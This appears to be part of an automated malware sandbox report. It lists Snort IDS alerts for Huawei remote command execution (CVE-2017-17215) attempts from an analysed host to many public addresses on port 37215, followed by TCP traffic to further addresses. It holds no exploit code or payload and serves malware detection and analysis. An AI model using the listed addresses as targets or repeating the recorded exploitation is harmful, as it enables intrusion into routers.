              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49654 -> 197.98.178.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40448 -> 156.11.232.27:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40448 -> 156.11.232.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43020 -> 156.253.209.134:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43020 -> 156.253.209.134:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42370 -> 197.218.185.191:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42370 -> 197.218.185.191:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55096 -> 41.59.124.13:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55096 -> 41.59.124.13:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42996 -> 197.211.105.203:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42996 -> 197.211.105.203:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34938 -> 156.205.120.113:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34938 -> 156.205.120.113:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33426 -> 41.199.166.65:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33426 -> 41.199.166.65:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41584 -> 41.169.217.182:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41584 -> 41.169.217.182:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52142 -> 197.94.187.63:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52142 -> 197.94.187.63:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51814 -> 197.105.195.56:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51814 -> 197.105.195.56:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42506 -> 197.235.137.220:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42506 -> 197.235.137.220:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36414 -> 156.115.29.3:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36414 -> 156.115.29.3:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36348 -> 41.222.149.196:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36348 -> 41.222.149.196:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34742 -> 156.230.39.62:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34742 -> 156.230.39.62:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41890 -> 197.253.99.100:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41890 -> 197.253.99.100:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50702 -> 156.238.163.110:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50702 -> 156.238.163.110:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33786 -> 156.179.78.181:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33786 -> 156.179.78.181:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50096 -> 156.175.16.45:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50096 -> 156.175.16.45:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51092 -> 197.21.231.68:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51092 -> 197.21.231.68:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46642 -> 41.205.70.44:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46642 -> 41.205.70.44:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38456 -> 156.139.95.100:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38456 -> 156.139.95.100:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48102 -> 41.41.194.38:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48102 -> 41.41.194.38:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43292 -> 41.102.185.160:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43292 -> 41.102.185.160:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40686 -> 41.219.156.112:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40686 -> 41.219.156.112:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35252 -> 41.136.197.138:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35252 -> 41.136.197.138:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45440 -> 197.110.124.70:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45440 -> 197.110.124.70:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44468 -> 156.134.62.117:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44468 -> 156.134.62.117:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57854 -> 156.211.139.234:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57854 -> 156.211.139.234:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33540 -> 41.69.228.208:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33540 -> 41.69.228.208:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37698 -> 41.34.192.208:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37698 -> 41.34.192.208:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55306 -> 156.199.176.162:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55306 -> 156.199.176.162:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60154 -> 197.176.59.104:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60154 -> 197.176.59.104:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48850 -> 156.202.215.189:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48850 -> 156.202.215.189:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36522 -> 41.139.140.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36522 -> 41.139.140.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34632 -> 41.79.189.48:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34632 -> 41.79.189.48:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59702 -> 156.123.237.221:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59702 -> 156.123.237.221:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60102 -> 197.140.21.238:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60102 -> 197.140.21.238:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55296 -> 156.209.45.106:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55296 -> 156.209.45.106:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57464 -> 41.65.114.229:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57464 -> 41.65.114.229:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37844 -> 156.195.94.23:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37844 -> 156.195.94.23:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57678 -> 41.13.119.15:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57678 -> 41.13.119.15:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33040 -> 156.217.108.5:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33040 -> 156.217.108.5:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56568 -> 197.123.247.90:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56568 -> 197.123.247.90:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41532 -> 197.127.189.142:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41532 -> 197.127.189.142:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39800 -> 156.160.21.128:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39800 -> 156.160.21.128:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44078 -> 41.69.149.120:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44078 -> 41.69.149.120:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50148 -> 156.179.233.113:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50148 -> 156.179.233.113:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44542 -> 41.167.61.202:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44542 -> 41.167.61.202:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45616 -> 41.124.122.69:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45616 -> 41.124.122.69:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48948 -> 41.116.99.196:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48948 -> 41.116.99.196:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34830 -> 197.26.246.153:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34830 -> 197.26.246.153:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53528 -> 41.9.80.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53528 -> 41.9.80.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50966 -> 156.110.2.110:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50966 -> 156.110.2.110:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59998 -> 41.122.109.42:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59998 -> 41.122.109.42:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60220 -> 41.94.153.112:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60220 -> 41.94.153.112:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53280 -> 156.226.178.21:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53280 -> 156.226.178.21:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33396 -> 41.55.41.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33396 -> 41.55.41.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46806 -> 197.214.46.200:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46806 -> 197.214.46.200:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44576 -> 197.152.159.10:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44576 -> 197.152.159.10:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58464 -> 41.57.17.164:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58464 -> 41.57.17.164:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46504 -> 197.0.201.185:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46504 -> 197.0.201.185:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:32862 -> 41.237.134.242:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:32862 -> 41.237.134.242:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48406 -> 41.226.55.109:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48406 -> 41.226.55.109:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48172 -> 156.168.245.29:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48172 -> 156.168.245.29:37215
              Source: global trafficTCP traffic: 41.62.199.115 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.9.88.239 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.78.13.161 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.167.122.41 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.53.81.129 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.38.42.170 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.24.139.66 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.147.113.230 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.112.46.16 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.143.243.166 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.221.129.41 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.250.250.184 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.194.19.10 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.11.121.199 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.118.92.132 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.151.251.55 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.110.181.97 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.11.6.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.186.90.45 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.136.243.130 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.201.148.50 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.5.128.132 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.18.60.252 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.15.193.245 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.125.140.84 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.196.240.81 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.234.232.228 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.219.70.72 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.159.169.105 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.140.76.152 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.226.176.129 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.92.111.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.201.14.29 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.243.244.21 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.92.212.5 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.177.48.90 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.47.68.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.137.56.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.67.226.82 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.223.92.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.89.36.101 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.244.207.155 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.207.96.120 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.5.141.78 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.123.58.130 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.161.209.230 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.245.32.228 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.113.11.68 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.178.187.242 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.0.100.48 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.30.124.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.3.246.202 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.37.141.110 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.103.142.240 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.236.106.252 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.97.62.235 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.193.155.19 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.98.83.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.30.139.237 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.57.11.197 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.221.145.171 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.163.10.127 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.143.57.24 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.96.80.253 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.192.210.171 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.117.1.160 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.67.60.182 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.197.138.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.179.100.196 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.158.211.230 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.218.28.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.172.155.122 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.239.8.85 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.53.161.229 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.7.1.172 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.168.80.221 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.10.180.100 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.34.211.222 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.224.63.34 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.10.20.117 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.94.210.141 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.200.225.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.174.51.18 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.92.127.129 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.72.196.183 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.33.14.33 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.79.242.90 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.249.229.189 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.37.21.3 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.168.195.48 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.13.238.227 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.1.38.160 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.197.132.147 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.82.129.139 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.32.132.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.111.74.7 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.8.238.78 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.254.247.111 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.15.249.219 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.27.200.127 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.163.61.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.17.122.194 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.249.70.243 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.125.251.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.41.124.55 ports 1,2,3,5,7,37215
